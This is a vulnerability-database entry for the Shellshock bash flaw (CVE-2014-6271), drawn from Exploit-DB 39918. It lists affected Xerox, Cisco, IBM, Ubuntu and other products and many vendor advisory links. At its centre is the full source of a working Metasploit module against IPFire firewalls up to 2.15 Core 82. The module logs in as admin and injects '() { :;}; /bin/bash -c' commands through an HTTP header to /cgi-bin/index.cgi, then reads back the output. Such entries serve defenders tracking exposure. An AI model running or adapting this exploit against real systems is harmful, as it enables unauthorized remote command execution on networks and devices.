Details of VAR-E-201409-0013

ID

VAR-E-201409-0013

CVE

cve_id:	CVE-2014-6271	Trust: 1.0
cve_id:	CVE-2014-6278	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 39918

EDB ID

39918

TITLE

IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) - CGI remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 39918

DESCRIPTION

IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit). CVE-2014-6271 . remote exploit for CGI platform

Trust: 1.0

sources: EXPLOIT-DB: 39918

AFFECTED PRODUCTS

vendor:	ipfire	model:	-	scope:	-	version:	-	Trust: 1.0
vendor:	xerox	model:	workcentre	scope:	eq	version:	7245	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7242	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7238	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7235	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7232	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7228	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	78000	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	67000	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9393	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9303	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9302	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9301	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.1	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway patch	scope:	eq	version:	7.01	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.0	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.22	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.21	Trust: 0.3
vendor:	ibm	model:	ds8000	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	hp	model:	insight control	scope:	eq	version:	0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.2	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gss 4492r global site selector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	5(2)	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16.2	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 39918

EXPLOIT

##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
'Description' => %q(
IPFire, a free linux based open source firewall distribution,
version <= 2.15 Update Core 82 contains an authenticated remote
command execution vulnerability via shellshock in the request headers.
),
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # module
'Claudio Viviani' # discovery
],
'References' =>
[
[ 'EDB', '34839' ],
[ 'CVE', '2014-6271']
],
'License' => MSF_LICENSE,
'Platform' => %w( linux unix ),
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/generic'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2014'
)
)

register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
Opt::RPORT(444)
], self.class
)
end

def check
begin
res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body

if version && update && version == "2.15" && update.to_i < 83
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end

#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; /bin/bash -c "#{cmd}" }
end

def exploit
begin
payload = cve_2014_6271(datastore['CMD'])
vprint_status("Exploiting with payload: #{payload}")
res = send_request_cgi(
'uri' => '/cgi-bin/index.cgi',
'method' => 'GET',
'headers' => { 'VULN' => payload }
)

fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
/<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
print_good(output) unless output.nil?

rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end

Trust: 1.0

sources: EXPLOIT-DB: 39918

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 39918

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 39918

TYPE

'Shellshock' Bash Environment Variable Command Injection (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 39918

CREDITS

Metasploit

Trust: 1.0

sources: EXPLOIT-DB: 39918

EXTERNAL IDS

db:	NVD	id:	CVE-2014-6271	Trust: 1.0
db:	EXPLOIT-DB	id:	39918	Trust: 1.0
db:	JUNIPER	id:	JSA10661	Trust: 0.3
db:	JUNIPER	id:	JSA10648	Trust: 0.3
db:	ICS CERT	id:	ICSA-14-269-01	Trust: 0.3
db:	CERT/CC	id:	VU#252743	Trust: 0.3
db:	MCAFEE	id:	SB10085	Trust: 0.3
db:	NVD	id:	CVE-2014-7169	Trust: 0.3
db:	NVD	id:	CVE-2014-6278	Trust: 0.3
db:	BID	id:	70166	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 39918

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2014-6271	Trust: 1.0
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685873	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685875	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687971	Trust: 0.3
url:	http://www.gnu.org/software/bash/	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686433	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686246	Trust: 0.3
url:	https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685733	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905	Trust: 0.3
url:	http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2014/oct/25	Trust: 0.3
url:	http://www.vmware.com/security/advisories/vmsa-2014-0010.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685673	Trust: 0.3
url:	https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982	Trust: 0.3
url:	http://www.fortiguard.com/advisory/fg-ir-14-030/	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687079	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686445	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/77	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471532	Trust: 0.3
url:	https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=&solutionid=sk102673	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685541	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686479	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paps5	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004903	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptz	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479505	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=kb83017	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss	Trust: 0.3
url:	http://lcamtuf.blogspot.in/2014/09/quick-notes-about-bash-bug-its-impact.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10085	Trust: 0.3
url:	https://ics-cert.us-cert.gov/advisories/supplement-icsa-14-269-01	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183172	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004932	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479601	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685749	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685691	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686131	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10661&cat=sirt_1&actp=list	Trust: 0.3
url:	http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686024	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/76	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685837	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptm	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf	Trust: 0.3
url:	https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00040.html	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686037	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686098	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=isg3t1021361	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686132	Trust: 0.3
url:	http://lcamtuf.blogspot.de/2014/09/bash-bug-apply-unofficial-patch-now.html	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685914	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685604	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183088	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686171	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686494	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10648	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 39918

SOURCES

db:	BID	id:	70166
db:	EXPLOIT-DB	id:	39918

LAST UPDATE DATE

2023-05-30T10:41:05.803000+00:00

SOURCES UPDATE DATE

db:

BID

id:

70166

date:

2016-07-05T21:53:00

SOURCES RELEASE DATE

db:	BID	id:	70166	date:	2014-09-27T00:00:00
db:	EXPLOIT-DB	id:	39918	date:	2016-06-10T00:00:00

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE